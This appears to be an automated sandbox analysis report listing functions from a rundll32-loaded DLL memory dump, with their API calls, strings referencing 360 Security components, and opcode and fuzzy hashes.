                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno
                                                                  • String ID:
                                                                  • API String ID: 2918714741-0
                                                                  • Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                  • Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
                                                                  • Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                  • Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180056664 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 463registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                    • Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
                                                                    • Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
                                                                    • Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A
                                                                  • RegCloseKey.ADVAPI32 ref: 0000000180056B49
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
                                                                  • String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
                                                                  • API String ID: 2226481571-3054377637
                                                                  • Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                  • Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
                                                                  • Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                  • Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004C720 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$??2@??3@_wtoi
                                                                  • String ID: //reccfg/wndclass
                                                                  • API String ID: 1119205991-3779619899
                                                                  • Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                  • Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
                                                                  • Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                  • Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180042664 Relevance: 10.7, APIs: 7, Instructions: 237networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$htonl$htonsmemmove
                                                                  • String ID:
                                                                  • API String ID: 2604728826-0
                                                                  • Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                  • Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
                                                                  • Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                  • Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180068020 Relevance: 10.7, APIs: 7, Instructions: 200COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
                                                                  • String ID:
                                                                  • API String ID: 223594506-0
                                                                  • Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                  • Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
                                                                  • Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                  • Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000CB00 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value_errno$HeapProcess_time64
                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                  • API String ID: 2146318826-610660357
                                                                  • Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                  • Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
                                                                  • Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                  • Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000E478 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Stream$??3@CreateFromLockSizeUnlock
                                                                  • String ID: __Location__
                                                                  • API String ID: 3539542440-1240413640
                                                                  • Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                  • Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
                                                                  • Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                  • Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180008C68 Relevance: 10.6, APIs: 7, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID:
                                                                  • API String ID: 3213498283-0
                                                                  • Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                  • Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
                                                                  • Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                  • Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000C97C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$_time64$HeapProcess
                                                                  • String ID: %s_count$%s_lasttime$CloudCfg
                                                                  • API String ID: 1319719158-610660357
                                                                  • Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                  • Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
                                                                  • Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                  • Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005AAEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
                                                                  • String ID: ..\config\msgcenter64.dat
                                                                  • API String ID: 1552649294-925171115
                                                                  • Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                  • Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
                                                                  • Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                  • Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180056534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                  • String ID: safemon\360EDRSensor.exe
                                                                  • API String ID: 2297386589-1382049097
                                                                  • Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                  • Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
                                                                  • Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
                                                                  • Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800562D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
                                                                  • String ID: safemon\360ExtHost.exe
                                                                  • API String ID: 2297386589-1382862812
                                                                  • Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                  • Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
                                                                  • Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
                                                                  • Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000892C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCloseHandleModuleOpenProc
                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                  • API String ID: 823179699-3913318428
                                                                  • Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                  • Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
                                                                  • Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
                                                                  • Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004410C Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
                                                                  • String ID:
                                                                  • API String ID: 1109857607-0
                                                                  • Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                  • Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
                                                                  • Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
                                                                  • Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180084E36 Relevance: 10.6, APIs: 7, Instructions: 50memorysynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
                                                                  • String ID:
                                                                  • API String ID: 2337826640-0
                                                                  • Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                  • Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
                                                                  • Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
                                                                  • Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180064040 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                  • Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
                                                                  • Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
                                                                  • Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180018E8C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                  • String ID: L "$\\.\360SelfProtection
                                                                  • API String ID: 3778458602-907869749
                                                                  • Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                  • Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
                                                                  • Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
                                                                  • Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

